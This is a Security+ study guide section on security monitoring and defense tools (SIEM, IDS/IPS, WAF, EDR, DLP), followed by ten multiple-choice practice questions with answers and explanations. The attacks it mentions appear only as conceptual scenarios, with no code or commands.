Domain 4 – Section B Review: Monitoring and Defense

Security+ Domain 4 — Security Operations Section B — Monitoring and Defense Review 10 Questions

This section integrates:

Security Monitoring and Log Analysis
Firewalls, IDS, and IPS
Endpoint Detection and Response (EDR) and Data Loss Prevention (DLP)

Security+ expects you to understand how monitoring tools detect threats, how network defenses operate, and how endpoint and data protection complement each other.

1. Security Monitoring and Log Analysis

Monitoring provides visibility into what is happening across the environment:

If you are not monitoring, you are not detecting.
If you are not correlating, you are drowning in alerts.

SIEM (Security Information and Event Management) — aggregates, correlates, and analyzes logs from multiple sources.
Log sources — firewalls, servers, endpoints, applications, authentication systems.
Alerting — rules and thresholds that trigger notifications for suspicious activity.
Retention — logs must be stored long enough to support investigations and compliance.

Raw logs are data. Correlated logs are intelligence. SIEM turns data into actionable alerts.

2. Firewalls, IDS, and IPS

Network defense tools operate at different points and in different modes:

Firewall — filters traffic based on rules (allow/deny by IP, port, protocol).
IDS (Intrusion Detection System) — monitors and alerts on suspicious traffic but does not block.
IPS (Intrusion Prevention System) — monitors and actively blocks malicious traffic inline.
WAF (Web Application Firewall) — filters HTTP/HTTPS traffic to protect web applications.

IDS detects and alerts. IPS detects and blocks.
A firewall filters by rule. An IPS filters by behavior and signature.

False positives (legitimate traffic flagged as malicious) and false negatives (malicious traffic not detected) are the key tuning challenges.

3. Endpoint Detection and Data Loss Prevention

Protection at the endpoint and data level completes the defense strategy:

EDR — monitors endpoint behavior, detects threats, and enables response actions (isolation, remediation).
Antivirus/antimalware — signature-based detection of known threats.
DLP — prevents unauthorized data transfers based on content inspection and policy.
Host-based firewall — filters traffic at the individual endpoint level.

EDR goes beyond traditional antivirus by analyzing behavior patterns rather than relying solely on signatures. DLP focuses on protecting data regardless of the threat type.

Section B Decision Pattern

When unsure in Domain 4 Section B:

Determine if the scenario needs detection only (IDS) or detection and prevention (IPS).
Use SIEM when log correlation and alerting are required.
Apply DLP when the concern is data leaving the organization.
Use EDR when endpoint-level threat detection and response are needed.
Remember: WAF protects web applications; network firewalls protect network segments.

Section B – Practice Questions

Question 1

A security analyst reviews SIEM alerts and notices multiple failed login attempts from a single IP address across 15 different user accounts in a two-minute window. What type of attack does this suggest?

A. Brute force against a single account
B. Password spraying
C. Credential stuffing
D. Phishing

Answer & reasoning

Correct: B

Password spraying tries a small number of common passwords across many accounts. The pattern of one IP targeting multiple accounts in rapid succession indicates password spraying rather than brute force (which targets one account) or credential stuffing (which uses known credential pairs).

Question 2

An IDS generates an alert for traffic that is later confirmed to be a legitimate software update. What is this type of alert called?

A. True positive
B. False positive
C. True negative
D. False negative

Answer & reasoning

Correct: B

A false positive occurs when the system incorrectly identifies legitimate traffic as malicious. The IDS alerted on non-malicious activity. Tuning rules and updating signatures reduce false positives while maintaining detection accuracy.

Question 3

A company needs to prevent employees from uploading confidential documents to personal cloud storage services. Which technology is MOST appropriate?

A. IPS
B. SIEM
C. DLP
D. EDR

Answer & reasoning

Correct: C

Data Loss Prevention (DLP) inspects content and enforces policies that prevent unauthorized data transfers. DLP can identify confidential documents based on content patterns, classification labels, or fingerprinting and block uploads to unauthorized destinations.

Question 4

An organization deploys an inline device that inspects all incoming traffic and automatically drops packets matching known attack signatures. What type of device is this?

A. IDS
B. Proxy server
C. SIEM
D. IPS

Answer & reasoning

Correct: D

An IPS operates inline and can actively block (drop) malicious traffic based on signatures and behavioral analysis. An IDS would only detect and alert, not drop packets. The key distinction is that IPS takes automated action to prevent attacks.

Question 5

A malware infection evades the company's signature-based antivirus. The security team deploys a tool that detects the malware by analyzing abnormal process behavior on the endpoint. What type of tool is this?

A. Network firewall
B. DLP agent
C. EDR solution
D. Vulnerability scanner

Answer & reasoning

Correct: C

EDR (Endpoint Detection and Response) uses behavioral analysis to detect threats that signature-based antivirus misses. EDR monitors process execution, file changes, network connections, and other endpoint behaviors to identify and respond to sophisticated threats.

Question 6

A web application is targeted by SQL injection attacks. The network firewall does not detect the attacks because they arrive over HTTPS on port 443. What additional control should be implemented?

A. Deploy a WAF
B. Close port 443
C. Increase IDS sensitivity
D. Add more firewall rules

Answer & reasoning

Correct: A

A Web Application Firewall (WAF) inspects HTTP/HTTPS traffic at the application layer and can detect and block SQL injection, XSS, and other web-specific attacks. Network firewalls operate at lower layers and cannot inspect encrypted application-layer content.

Question 7

A SIEM correlation rule triggers when it detects a user logging in from two geographically distant locations within 10 minutes. What type of detection is this?

A. Signature-based detection
B. Impossible travel detection
C. Heuristic scanning
D. Port scanning detection

Answer & reasoning

Correct: B

Impossible travel detection identifies when a user appears to log in from two locations that are too far apart to travel between in the elapsed time. This indicates credential compromise — someone else is using the user's credentials from a different location.

Question 8

An organization's IPS is blocking legitimate business partner traffic due to overly aggressive rules. What should the security team do?

A. Disable the IPS entirely
B. Switch the IPS to IDS mode
C. Whitelist all business partner IP addresses from all inspection
D. Tune the IPS rules to reduce false positives while maintaining protection

Answer & reasoning

Correct: D

Tuning IPS rules balances security and usability. Disabling or bypassing the IPS entirely removes protection. Switching to IDS mode removes prevention capability. Whitelisting all traffic from partner IPs creates a security gap. Rule tuning addresses the specific false positive while maintaining protection.

Question 9

A security analyst needs to investigate a security incident that occurred three months ago. The analyst discovers that firewall logs older than 30 days have been deleted. What control failure occurred?

A. Insufficient log retention
B. Misconfigured alerting
C. Missing encryption
D. Inadequate access controls

Answer & reasoning

Correct: A

Log retention policies must align with investigation and compliance requirements. A 30-day retention period is insufficient for investigating incidents discovered after that window. Retention periods should be based on regulatory requirements, industry standards, and organizational needs.

Question 10

An EDR solution detects suspicious PowerShell activity on a workstation and automatically isolates the machine from the network while alerting the security team. What capability does this demonstrate?

A. Vulnerability scanning
B. Log aggregation
C. Automated incident response
D. Patch management

Answer & reasoning

Correct: C

The EDR performed automated incident response by detecting the threat, taking a containment action (network isolation), and alerting the team. This combination of detection, automated response, and notification is a core EDR capability that reduces the time between detection and containment.